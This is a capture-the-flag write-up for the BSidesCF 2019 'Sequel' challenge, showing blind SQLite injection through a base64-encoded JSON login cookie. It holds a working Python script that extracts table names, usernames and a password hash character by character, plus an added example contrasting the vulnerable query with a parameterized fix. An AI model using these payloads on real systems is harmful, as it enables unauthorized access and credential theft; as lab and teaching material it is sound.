[BSidesCF 2019]Sequel


SQLite injection
Brute-forcing the login yields the credentials guest / guest.
After being stuck for a while, I found this text in the cookie:
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
Base64-decoding it gives:
{"username":"guest","password":"guest"}
So the injection point is probably the cookie.

import requests
import base64
import string
flag = ""
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
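# '%' and '_' are LIKE wildcards and '"' would close the injected string literal,
# so they are left out of the candidate characters. SQLite's LIKE is also
# case-insensitive for ASCII by default, so recovered letters may differ in case.
charset = [c for c in string.printable if c not in '%_"\\']
for i in range(50):
    for j in charset: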
        tmp = flag + j
        '''
        # table names
        if j == 'n': continue
        if j == 'r': continue
        if j == 's': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo
        '''
        '''
        #username
        if j == 'g': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #username guest,sequeladmin
        '''
        #password
        payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #password f5ec3af19f0d3679e7d5a148f4ac323d
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get(url, cookies={"1337_AUTH" : payload})
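        # the page only contains "Movie" when the injected condition is true
        if "Movie" in r.text:
            flag = tmp
            print(flag)
            break
    else:
        # no candidate extended the prefix: the value is complete
        break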

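Logging in gives the flag.
As for tables, this is the schema of sqlite_master:
CREATE TABLE sqlite_master (
    type TEXT,        -- 'table'
    name TEXT,        -- table name
    tbl_name TEXT,    -- table name
    rootpage INTEGER, -- not sure
    sql TEXT          -- the CREATE TABLE statement
);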
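
The cookie check that the script above relies on, reconstructed as an added example (it is not the challenge's code and not part of the original write-up), shown next to the parameterized form that removes the true/false oracle. The query shape in `auth_concat`, the function names and the sample rows are assumptions; only the `userinfo` table, its columns and the cookie format come from the write-up.

```python
import base64
import json
import sqlite3

def make_db():
    # Constructed sample rows; table and column names follow the write-up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userinfo (username TEXT, password TEXT)")
    db.executemany("INSERT INTO userinfo VALUES (?, ?)",
                   [("guest", "guest"), ("sequeladmin", "constructed-secret")])
    return db

def cookie_for(username, password):
    # Same shape as the cookie shown above: base64 over a JSON object.
    raw = json.dumps({"username": username, "password": password})
    return base64.b64encode(raw.encode()).decode()

def decode_cookie(cookie):
    # Everything decoded here is client-controlled.
    creds = json.loads(base64.b64decode(cookie))
    return str(creds["username"]), str(creds["password"])

def auth_concat(db, cookie):
    # Assumed vulnerable pattern: values pasted between double quotes, which
    # SQLite accepts as string literals by default.
    user, pw = decode_cookie(cookie)
    sql = ('SELECT username FROM userinfo '
           'WHERE username = "%s" AND password = "%s"' % (user, pw))
    return db.execute(sql).fetchone() is not None

def auth_param(db, cookie):
    # Hardened form: bound parameters are treated as data, never as SQL text.
    user, pw = decode_cookie(cookie)
    sql = "SELECT username FROM userinfo WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

def probe(prefix):
    # Username value in the form used by the script above.
    inner = 'SELECT password FROM userinfo WHERE password LIKE "%s%%"' % prefix
    return cookie_for('" OR EXISTS(%s) OR "' % inner, "guest")

if __name__ == "__main__":
    db = make_db()
    for label, cookie in [("guest", cookie_for("guest", "guest")),
                          ("probe c", probe("c")), ("probe z", probe("z"))]:
        print(label, auth_concat(db, cookie), auth_param(db, cookie))
```

With the concatenated query the login result tracks whether the guessed prefix matches a stored password; with bound parameters both probes are simply failed logins.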
